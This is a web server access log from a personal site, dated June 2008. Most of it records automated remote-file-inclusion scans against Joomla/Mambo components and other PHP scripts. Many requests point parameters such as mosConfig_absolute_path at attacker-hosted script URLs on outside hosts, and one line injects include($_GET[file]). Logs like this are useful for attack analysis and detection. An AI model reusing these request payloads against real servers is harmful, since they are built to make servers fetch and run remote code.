193.239.211.19 - - [25/Jun/2008:10:21:36 -0700] "GET /logs/language/lang_english/lang_activity.php?phpbb_root_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:10:21:36 -0700] "GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
213.188.172.6 - - [25/Jun/2008:10:22:13 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:10:22:18 -0700] "GET /logs/access_080215.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:10:22:18 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:10:22:18 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:10:22:23 -0700] "GET /logs/index.php?option=com_joomlaxplorer&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:10:22:24 -0700] "GET /logs/access_071220.log/index.php?option=com_joomlaxplorer&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:10:22:25 -0700] "GET /index.php?option=com_joomlaxplorer&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 200 18487 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:10:22:31 -0700] "GET /logs/access_080212.log/index.php?option=com_joomlaxplorer&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:10:22:47 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:10:22:48 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:10:22:48 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:22:51 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:22:52 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:10:22:54 -0700] "GET /logs/access_071229.log/index.php?option=com_joomlaxplorer&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:10:23:19 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:10:23:24 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:23:30 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:23:30 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
87.246.68.51 - - [25/Jun/2008:10:23:31 -0700] "GET /logs/access_080108.log/index.php?seccion=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:23:32 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
87.246.68.51 - - [25/Jun/2008:10:23:33 -0700] "GET /index.php?seccion=http://lodolo.com/x?? HTTP/1.1" 200 18367 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.51 - - [25/Jun/2008:10:23:33 -0700] "GET /logs/index.php?seccion=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.34.140.215 - - [25/Jun/2008:10:23:43 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [25/Jun/2008:10:23:44 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:24:05 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:10:24:21 -0700] "GET /logs/module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:10:24:21 -0700] "GET /module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:10:24:32 -0700] "GET /logs/access_080118.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:10:24:32 -0700] "GET /errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:10:24:32 -0700] "GET /logs/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.75.39 - - [25/Jun/2008:10:24:33 -0700] "GET /logs/module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [25/Jun/2008:10:24:33 -0700] "GET /module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:10:25:15 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:10:25:20 -0700] "GET /modules/My_eGallery/index.php?basepath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.249.130 - - [25/Jun/2008:10:25:27 -0700] "GET /logs/access_080330.log/appserv/main.php?appserv_root=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.249.130 - - [25/Jun/2008:10:25:27 -0700] "GET /appserv/main.php?appserv_root=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.249.130 - - [25/Jun/2008:10:25:27 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:25:32 -0700] "GET /logs/module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:25:32 -0700] "GET /module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:10:25:39 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:10:25:39 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:10:25:40 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:10:26:12 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:10:26:13 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:10:26:23 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:10:26:45 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:10:26:51 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 200 18509 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:10:26:51 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:10:27:11 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:10:27:12 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:10:27:13 -0700] "GET /plans/ HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.87.251.47 - - [25/Jun/2008:10:28:12 -0700] "GET /logs/access_080120.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:28:21 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:10:28:23 -0700] "GET /logs/access_080229.log/module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:28:23 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 200 18513 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:28:24 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:10:28:25 -0700] "GET /logs/access_080225.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:10:28:25 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:10:28:26 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:28:29 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:28:31 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 200 18529 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:28:32 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:10:28:43 -0700] "GET /data/compatible.php?module_name=Mobile%20Entartainment%22 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:10:28:43 -0700] "GET /logs/data/compatible.php?module_name=Mobile%20Entartainment%22 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:10:28:43 -0700] "GET /logs/access_080225.log/data/compatible.php?module_name=Mobile%20Entartainment%22 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:28:51 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:28:53 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 200 18529 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:10:28:54 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.48.162 - - [25/Jun/2008:10:29:02 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:10:29:10 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:10:29:12 -0700] "GET /logs/access_080312.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
65.55.211.27 - - [25/Jun/2008:10:29:13 -0700] "GET /megumi/?M=D HTTP/1.1" 200 1079 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
91.194.90.180 - - [25/Jun/2008:10:29:28 -0700] "GET ///admin/business_inc/saveserver.php?thisdir=http://samurai.tuxfamily.org/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:10:29:30 -0700] "GET /logs/access_080312.log/data/compatible.php?module_name=Mobile%20Entartainment%22 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:29:31 -0700] "GET /logs/access_080229.log/module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.93.48.162 - - [25/Jun/2008:10:29:38 -0700] "GET /logs/access_080330.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [25/Jun/2008:10:29:38 -0700] "GET /logs/access_080330.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:10:29:40 -0700] "GET /logs//main.php?p=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:10:29:40 -0700] "GET //main.php?p=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
69.93.48.162 - - [25/Jun/2008:10:29:43 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [25/Jun/2008:10:29:43 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:10:30:05 -0700] "GET /logs/access_080228.log//1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.175.69 - - [25/Jun/2008:10:30:29 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.175.69 - - [25/Jun/2008:10:30:30 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.249.130 - - [25/Jun/2008:10:30:42 -0700] "GET /logs/access_080319.log/appserv/main.php?appserv_root=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:30:58 -0700] "GET /logs/access_080117.log/index.php?pg=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:31:00 -0700] "GET /index.php?pg=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 18439 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:31:00 -0700] "GET /logs/index.php?pg=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.20.175.69 - - [25/Jun/2008:10:31:20 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.175.69 - - [25/Jun/2008:10:31:21 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:32:02 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:32:03 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:32:03 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [25/Jun/2008:10:32:36 -0700] "GET ///administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://samurai.tuxfamily.org/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.195.37.125 - - [25/Jun/2008:10:32:46 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 6895 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [25/Jun/2008:10:32:47 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/04/03/hello-world/trackback/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [25/Jun/2008:10:32:47 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/04/03/hello-world/trackback/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [25/Jun/2008:10:32:47 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/04/03/hello-world/trackback/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:32:48 -0700] "GET /logs/access_071224.log/index.php?pg=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:32:51 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:10:33:58 -0700] "GET /logs/access_080120.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:10:34:10 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:10:34:10 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:10:34:10 -0700] "GET /logs/access_080229.log/module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:10:34:11 -0700] "GET /module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:10:34:11 -0700] "GET /logs/module_db.php?pivot_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.159.55.66 - - [25/Jun/2008:10:34:17 -0700] "GET /logs/access_080118.log//inc/cmses/aedating4CMS.php?dir[inc]=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.159.55.66 - - [25/Jun/2008:10:34:17 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.159.55.66 - - [25/Jun/2008:10:34:18 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.159.55.66 - - [25/Jun/2008:10:34:47 -0700] "GET /logs/access_071219.log//inc/cmses/aedating4CMS.php?dir[inc]=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:36:18 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:36:22 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:36:32 -0700] "GET /logs/access.log/admincp/auth/checklogin.php?cfgProgDir=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
